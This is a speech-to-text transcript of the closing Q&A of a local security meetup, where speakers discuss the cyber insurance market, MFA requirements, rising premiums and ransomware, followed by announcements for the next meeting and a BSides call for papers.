having not having cyber insurance would be the risk of that would be far outweigh uh uh the risk of getting hit i mean that i would not go without it excellent yeah yeah i agree that that was he actually kind of touched on the follow-up question to that which is you know my kind of understanding is that you know a lot of these companies you know when it when there's a catastrophic event you know they could it can contribute to the insurers leaving the market um you know entirely and and kind of kind of the idea of where there's you know no they're not able to or aren't imposing any kind of obligations or at least can't prove like

you know it's not like they're collecting data to show you know what we are and aren't doing um uh uh or you know that that we're following any kind of best practices you know as a policy holder so um so yeah yeah that's excellent thank you yeah and i know i know that ryan and his team uh you know they deal with the carriers all the time and they're trying to get us in front of these characters to try to influence a little bit of that also um because it's all about the information you get right and you know square shooting is the way to go and that's why i told the guys from hanover

i said listen here's the deal mfa is cool but there's ways around mfa and you got to have some more some more tools in there we talked actually the same same style of presentation not the same one like i talked about a lot of these different tools with them so i would expect them to start bringing that stuff up you know um but they're not i would honestly i see them saying this if you don't have this minimum based on we're not going to insure you yeah absolutely i agree and talking to some of these insurers and having folks on our team who who work in the insurance space mfa um most insurers now consider an

uninsurable risk so if you don't have it they will not insure you um they're seeing a lot of changes as far as how policies are written there's a lot of talk with breach coaches about if ransomware itself is called out in a policy um if they if insurers will continue to provide coverage for that um you're seeing large companies who are are really starting to in some cases self-insured they have really high caps a lot of those smaller businesses where insurance companies are just killing it and making a ton of money in premiums um you know they typically have pretty low retentions and low caps but on that end you're paying a lot for that type of policy

so um there's a there's a lot going on in the cyber insurance space like he said they're they are bleeding money um heavily but on the on the flip side of that premiums are going up for for everyone and i i think last year or this year your premiums have increased you know 50 since last year so you know that puts organizations small organizations in a really tough spot um and there's a lot to weigh there from a business perspective yeah and it's very difficult to write a cyber insurance policy because the you know an auto policy oh my god these guys have got data galore that they can set rates based upon all this information they

have but with cyber insurance it's fairly new product and the information and the threats and the risks change by the minute so this is a this is a hard world for the insurance companies to to to get into honestly i i i could see some insurance companies we're out of sight um but we're gonna we're not deciding so it's gonna be an interesting thing coming up um you know ransomware and the cyber extortion is going to evolve it'll never go away uh it'll evolve if if the body administration came down today and said no no paying ransomware groups they're going to figure out a way to get around that and there's going to be a way that you

know they're going to make money and that's just the way criminals are you know back in the day when i started stolen property was sold at a flea market to a pawn shop today they're just selling it on craigslist and offer up right it's just it's an evolution and that's going to continue it'll be really interesting to see from the insurance perspective um this is like new within the past two or three weeks but the big insurers such as aig access beasley chubb who hold a lion's share of the market share for cyber policies they just started a new consortium um called cyber accuvu and the goal of that you know my understanding is to really

compile a lot of that data to try and understand trends risks things like that um to one help policyholders but then obviously they need to understand the data collectively to make better power decisions for the their market in general so um you know it'll be interesting to see what comes out of that yeah it's so it you know it's going to be an ever evolving place i would definitely keep an eyeball on it um you know it's not like like my homeowner's policy i just you know it goes away until you know one of our boobs comes in and rips my roof off but um you know it's going to be different you have to keep an eyeball on these

policies and keep up on it because it's going to be changing and the and all of that is just is every evolver like ryan said there's so many changes this this environment that we work in and information security you guys know this it's never the same day-to-day every case is different every attack is different every group uses different tactics and tools and that's what makes it extremely difficult with insurers excellent i appreciate the response thank you if you guys ever see uh if you ever want to see one of our haboobs look it up on the internet because i live on the south side of phoenix and that sucker hits me every time when it comes in

the back side of my house is a lighter shade of brown than the front side because of all the sand that's hidden over the years all right any other questions for keith before we wrap up today i know we're at the top of the hour but happy to go a few extra if there's any questions all right guys i'm here for you um you know my team's always available for you if you guys pick up something to send me an email say hey keith i was at you is a presentation um like i just questioned that question always willing to help guys i would rather talk to you guys in a situation like this or a couple of

questions then during an incident you guys are up all night drinking red bulls and monsters all right well that concludes this month's meeting we'll be back in august the second friday make sure like mike said to get your ticket for b signs uh i saw chad drop that in the chats at the top there and then also uh if you're interested in speaking there's an open cfp we'd love to have more folks from the greenville area get out and talk to that so uh have a great rest of your week have a great weekend all uh we'll see you guys next month